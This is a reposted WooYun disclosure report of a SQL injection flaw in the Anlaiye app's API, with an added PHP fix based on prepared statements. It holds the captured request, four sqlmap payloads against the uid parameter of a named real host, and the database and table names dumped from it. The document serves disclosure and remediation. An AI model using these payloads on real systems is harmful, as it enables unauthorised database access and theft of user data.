SQL injection vulnerability in the 俺来也 (Anlaiye) app

Posted by admin, 2017-03-28 20:06:52, 307 views
Summary

2016-03-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-07: The vendor has actively ignored the vulnerability; details disclosed to the public

Vulnerability overview

Defect ID: WooYun-2016-187907

Title: SQL injection vulnerability in the 俺来也 (Anlaiye) app

Vendor: 俺来也 (Anlaiye)

Author: seeicb

Submitted: 2016-03-23 12:15

Published: 2016-05-07 12:15

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Vendor not contacted, or vendor actively ignored the report

Source: www.wooyun.org; for questions or help, please contact

Tags: php + numeric-type injection


Vulnerability details

Brief description:

As in the title.

Detailed description:

Captured request from the app:
POST /api/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Host: c.anlaiye.com.cn
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; M463C Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip

uid=1278123&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d118ef8e741184739280

sqlmap output for the uid parameter:
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: uid=-2941') OR 8266=8266#&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uid=12780241') AND (SELECT 1177 FROM(SELECT COUNT(*),CONCAT(0x716b717a71,(SELECT (ELT(1177=1177,1))),0x7171786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('aVyk' LIKE 'aVyk&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: uid=12780241');(SELECT * FROM (SELECT(SLEEP(5)))zrJf)#&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: uid=12780241') AND (SELECT * FROM (SELECT(SLEEP(5)))ZOGq) AND ('JRDn' LIKE 'JRDn&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280
---
web application technology: PHP 5.4.35
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:

Proof of vulnerability:

Databases enumerated by sqlmap:
available databases [5]:
[*] anlaiye
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

Tables in the anlaiye database, as listed by sqlmap:
Database: anlaiye
[65 tables]
+-------------------------------+
| admin_app |
| admin_token |
| admin_user |
| admin_user_group |
| admin_user_permission |
| advert_board |
| advert_content |
| advert_page |
| bts_financing_order |
| bts_order |
| cas_click |
| cas_flow |
| cas_login_error |
| cas_login_log |
| cas_thirdinfo |
| cas_user |
| cas_user_consignee |
| cas_user_detail |
| cas_user_education_experience |
| cas_user_favorite |
| cas_user_lv |
| cas_user_lv_back |
| cas_user_photo |
| cas_user_share |
| cas_user_work_experience |
| comment_content |
| company_detail |
| company_position_relation |
| company_report_detail |
| company_resume_relation |
| exchange_information |
| forbidden_account |
| goods_attachment |
| goods_content |
| goods_content_detail |
| goods_specification |
| innovation_category |
| innovation_comment |
| innovation_content |
| innovation_content_detail |
| message_content |
| message_remind |
| position_category |
| position_content |
| position_education |
| position_experience |
| resume_content |
| resume_job_status |
| score_company_detail |
| score_user_detail |
| search_position_history |
| search_resume_history |
| store_user |
| system_frontend_menu |
| system_frontend_menu_copy |
| system_frontend_menu_group |
| system_navigation |
| tag_company_relation |
| tag_detail |
| tag_user_relation |
| train_category |
| train_content |
| train_content_detail |
| trend_attachment |
| trend_region |

Remediation:

Strengthen input filtering.

Copyright notice: please credit the source when reposting: seeicb@WooYun
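The remediation above is a single line, so here is an added example (not code from the report, the vendor or the Anlaiye app) of what "strengthen filtering" should mean for a numeric `uid`: the report does not show the application's query, and the `')` prefix of the sqlmap payloads only suggests that `uid` is interpolated inside a quoted, parenthesised expression, so the vulnerable function is an assumed reconstruction; the table `cas_user` is from the report, while the column names, function names and DSN are assumptions.

```php
<?php
// Added example, not the app's code. The vulnerable shape below is assumed from the
// `')` prefix of the sqlmap payloads in the report; cas_user is a table the report
// lists, the columns id and nickname are assumed.

// Vulnerable (assumed): uid is concatenated straight into the SQL string. With
// uid=-2941') OR 8266=8266#  the WHERE clause becomes always-true and the
// remainder of the query is commented out, which is exactly what the boolean-based
// blind finding in the report relies on.
function findUserVulnerable(mysqli $db, string $uid): ?array
{
    $sql = "SELECT id, nickname FROM cas_user WHERE (uid='$uid')";
    $result = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Hardened: uid is a numeric identifier, so reject anything that is not a positive
// integer before it reaches the database, then bind it as an integer parameter so
// MySQL receives query and data separately.
function findUser(PDO $db, string $rawUid): ?array
{
    $uid = filter_var($rawUid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        throw new InvalidArgumentException('uid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT id, nickname FROM cas_user WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection helper: turn off emulated prepares so the statement is prepared
// server-side rather than rebuilt as a string by the PDO driver, and make errors
// throw instead of failing silently.
function connect(string $dsn, string $user, string $password): PDO
{
    return new PDO($dsn, $user, $password, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

// Usage (DSN and credentials are placeholders):
// $db = connect('mysql:host=127.0.0.1;dbname=anlaiye;charset=utf8mb4', 'app', 'secret');
// var_dump(findUser($db, $_POST['uid'] ?? ''));
```

With the integer check in place, every payload shown in the report is rejected before a query is built, and the bound parameter protects the query even if a non-numeric field is handled the same way later.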


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined

Vulnerability Rank: 8 (WooYun rating)
